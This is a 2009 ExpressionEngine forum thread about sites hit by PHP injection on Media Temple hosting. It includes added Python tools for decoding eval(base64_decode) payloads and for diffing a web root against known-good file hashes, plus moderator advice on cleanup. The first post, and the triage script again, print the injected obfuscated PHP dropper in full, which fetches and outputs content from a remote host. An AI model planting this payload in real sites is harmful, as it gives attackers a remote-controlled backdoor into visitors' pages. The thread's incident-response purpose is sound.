EE PHP Exploit Found.
Posted: 10 November 2009 02:55 PM
Summer Student

Just wanted to let you guys know that two of my sites were recently taken offline due to a PHP injection into the index.php files in EE (running 1.6.8 and 1.5.2).

Here was the error I received when loading one of the sites:

Parse error: syntax error, unexpected T_STRING in /nfs/c02/h06/mnt/15909/domains/sahadeva.com/html/index.php on line 60

Here was the code being injected into the site:

<!--5edfgh345--><?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

I removed the code, updated the passwords for my EE install and FTP accounts. Things seem to be working again now - anything I can do besides changing my passwords?

Mod Edit: Moved to the Technical Support Forum
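The injected line above is worth triaging before deleting it. The following is an added example (not code from the thread or from ExpressionEngine) that scans PHP source for eval(base64_decode("...")) calls and the <!--...--> marker, decodes each payload without executing it, and pulls out the URLs it would contact. Run against the line posted above, the payload decodes to a short PHP snippet that fetches http://tourreviews.asia/links2/link.php (with cURL if available, otherwise file()) and prints the response into the page: a remote-content dropper rather than a self-contained backdoor, so the same line can serve spam links one day and something else the next. Note that the injected line itself is valid PHP; the reported "unexpected T_STRING" is consistent with it having been written inside an already-open <?php block, where `<!--5edfgh345-->` lexes as `<`, `!`, `--`, the integer `5` and then the bare label `edfgh345`. The surrounding index.php content below is constructed for the example; only the injected line is copied from the post.

```python
"""Triage helper for eval(base64_decode(...)) injections (added example, not EE code)."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Matches eval(base64_decode("...")) or eval(base64_decode('...')), tolerating whitespace.
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)
# The HTML-comment tag the injector used to mark its own line in this campaign.
MARKER_RE = re.compile(r"<!--\s*([0-9a-z]+)\s*-->")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


@dataclass
class Finding:
    line_no: int                 # 1-based line in the scanned text
    marker: Optional[str]        # text of a <!--...--> marker on that line, if any
    payload: str                 # decoded PHP that eval() would have run
    urls: List[str] = field(default_factory=list)  # URLs the payload references


def decode_payload(b64: str) -> str:
    """Decode the base64 argument; injectors sometimes wrap it across lines, so strip whitespace."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64), validate=True)
    return raw.decode("utf-8", errors="replace")


def scan_php_source(text: str) -> List[Finding]:
    """Return one Finding per eval(base64_decode(...)) call, with its decoded payload."""
    findings: List[Finding] = []
    for idx, line in enumerate(text.splitlines(), start=1):
        for m in EVAL_B64_RE.finditer(line):
            payload = decode_payload(m.group(2))
            marker = MARKER_RE.search(line)
            findings.append(Finding(
                line_no=idx,
                marker=marker.group(1) if marker else None,
                payload=payload,
                urls=URL_RE.findall(payload),
            ))
    return findings


# The exact line reported in the forum post.
INJECTED_LINE = (
    '<!--5edfgh345--><?php eval(base64_decode("'
    "JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyAN"
    "CiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENV"
    "UkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMo"
    "JGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo="
    '")); ?>'
)

# Constructed stand-in for a hit index.php: the attacker's line landed inside the open <?php block.
SAMPLE_INDEX_PHP = (
    "<?php\n"
    + "// constructed stand-in for the top of an ExpressionEngine index.php\n"
    + "$system_folder = 'system';\n"
    + INJECTED_LINE + "\n"
    + "$template_group = '';\n"
)


if __name__ == "__main__":
    for f in scan_php_source(SAMPLE_INDEX_PHP):
        print(f"line {f.line_no} marker={f.marker!r} urls={f.urls}")
        print(f.payload)
```

Feed it the real file contents (open(path).read()) across the web root and grep the URL list for anything that is not yours; the marker string is also a cheap thing to search every PHP file for, since the same campaign tends to reuse it.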

Posted: 10 November 2009 03:04 PM   [ # 1 ]
Moderator

Thank you for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. We need some additional information from you.

Is that a version of EE Core? What exact version and build are we dealing with? Do you have any other scripts on your account, whether in use or not (phpBB, etc.)?

If this is a shared hosting environment, the host can help us find the vector of attack. These attacks quite often start with some other script, even some other account on the server and spread from there.

To that, what is being hacked and changed? If you look through:

- path.php
- config.php
- index.php

Do you see malicious code being put in there or in other locations?

My suggestion would be to upgrade all installs to the latest version and build, completely replacing all files with known good copies, and change all of your passwords.

Although I have no reason to think this an issue with EE, we would very much like to get to the bottom of it.

 Signature 

ExpressionEngine 2.0 Downloads | Docs | Bugtracker

“If the English language made any sense, lackadaisical would have something to do with a shortage of flowers.” (Doug Larson)
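The moderator's two questions, what was changed and whether the files match known-good copies, are answered fastest with a hash manifest. Here is an added example (not code from the thread or from ExpressionEngine) that builds a SHA-256 manifest of a known-good tree, such as a fresh download of the same EE version plus your own templates, and diffs a live web root against it, reporting modified, added and removed files. The directory layout, file names and contents below are constructed inside a temporary directory so the example runs offline; the tampering mirrors what the thread describes (a line prepended to index.php) plus a dropped file and a deleted one to exercise all three result lists.

```python
"""Known-good file manifest and diff for a web root (added example, not EE code)."""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple


def sha256_file(path: str) -> str:
    """Stream a file through SHA-256 so large uploads do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map each file path relative to root (with '/' separators) to its SHA-256 digest."""
    manifest: Dict[str, str] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def diff_manifests(baseline: Dict[str, str], live: Dict[str, str]) -> Tuple[List[str], List[str], List[str]]:
    """Return (modified, added, removed) relative paths, comparing live against the baseline."""
    modified = sorted(p for p in baseline if p in live and baseline[p] != live[p])
    added = sorted(p for p in live if p not in baseline)
    removed = sorted(p for p in baseline if p not in live)
    return modified, added, removed


def _write(root: str, rel: str, data: str) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", newline="") as f:
        f.write(data)


def demo() -> Tuple[List[str], List[str], List[str]]:
    """Constructed scenario: a known-good copy next to a web root that has been tampered with."""
    clean_index = "<?php\n// stand-in for the ExpressionEngine front controller\n$system_folder = 'system';\n"
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "known_good")
        live = os.path.join(tmp, "html")
        for root in (good, live):
            _write(root, "index.php", clean_index)
            _write(root, "path.php", "<?php\n$system_folder = 'system';\n")
            _write(root, "system/config.php", "<?php\n$conf['app_version'] = '168';\n")
        # Tamper with the live copy: a line prepended to index.php, as in the thread ...
        _write(live, "index.php", '<!--5edfgh345--><?php eval(base64_decode("...")); ?>\n' + clean_index)
        # ... a dropped file that no clean install contains (constructed placeholder) ...
        _write(live, "images/.cache.php", "<?php /* constructed stand-in for a dropped file */ ?>\n")
        # ... and a file that went missing.
        os.remove(os.path.join(live, "path.php"))
        return diff_manifests(build_manifest(good), build_manifest(live))


if __name__ == "__main__":
    modified, added, removed = demo()
    print("modified:", modified)
    print("added:   ", added)
    print("removed: ", removed)
```

In practice, build the baseline from a fresh download of the exact EE version and build you run, store it off the server, and rerun the diff after any incident; files that show up as added, especially PHP under images/ or uploads/ directories, are the ones to inspect first, and anything modified gets replaced from the known-good copy rather than hand-edited.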

Posted: 23 November 2009 01:47 AM   [ # 2 ]
Summer Student

Hi -
I have had this happen to two EE sites recently, both on mediatemple servers (different account holders)
Any thoughts on how I can stop this occurring again?

One site is running 1.6.7 and the other is latest 1.6.8 build.

Posted: 23 November 2009 02:37 AM   [ # 3 ]
Moderator
leegreen - 23 November 2009 01:47 AM

I have had this happen to two EE sites recently, both on mediatemple servers (different account holders)
Any thoughts on how I can stop this occurring again?

Please understand that we have no reason to assume this to be an issue with EE. What we recommend in cases like that is to notify your host and work with them to understand how this break-in occurred, change all of your passwords (EE, FTP, MySQL) and replace all of your files with known good copies downloaded from our site, upgrading to the latest version and build in the process if you haven’t done so.

One site is running 1.6.7 and the other is latest 1.6.8 build.

Yes, we always recommend using the latest major version for security reasons. Even so, the recent series of events was a problem with MT (and limited to their servers).

 
Posted: 25 November 2009 05:48 PM   [ # 4 ]
Summer Student

This happened today to my client’s website while I was working in the Control Panel! ... “I just popped out the back for a few minutes and when I returned someone had stolen all my stuff!”

No website (index.php “Parse error: syntax error, unexpected T_STRING in /nfs/c04/h04/mnt/67006/domains/zok.com/html/index.php on line 61” )

Removed code, pushed up new clean page and website back online.
Checked for other signs of intrusion - nothing.
Passwords being changed.

FYI: 1.6.7 build 111. They have the 1.6.8 stuff to upgrade, but we resisted while we worked towards a launch three weeks ago.
Maybe we need to move to 1.6.8 this weekend, just to be on the safe side?

We have informed (mt) of the ‘break-in’. Still awaiting their reply.

Another (mt) (grid server) hosted site - so there is a pattern.

I got an email today from them, about my own account, not the client’s one.

Priority maintenance on DVS platform

To address a potentially critical security hole in the DVS platform, it
was necessary to restart all the VSes in order to enable the software
fix.

This restart was performed as a matter of urgent priority during the
early hours of Wednesday 25th November 2009.

Let’s hope they ‘fess up - after all, we all make mistakes sometimes - it’s just embarrassing and damaging after I recommended them, following 5 years of rock-solid web support.

Ho hum…

Posted: 25 November 2009 05:53 PM   [ # 5 ]
Lab Technician

Hi HEX32-
Thanks for reporting this. If you hear anything back from Media Temple, please let us know.

In regards to upgrading to 1.6.8. While this security issue is almost certainly a Media Temple issue, we certainly recommend upgrading to 1.6.8, as it has some important fixes and security updates.

Thanks again for keeping us informed!

 Signature 

Render Creative
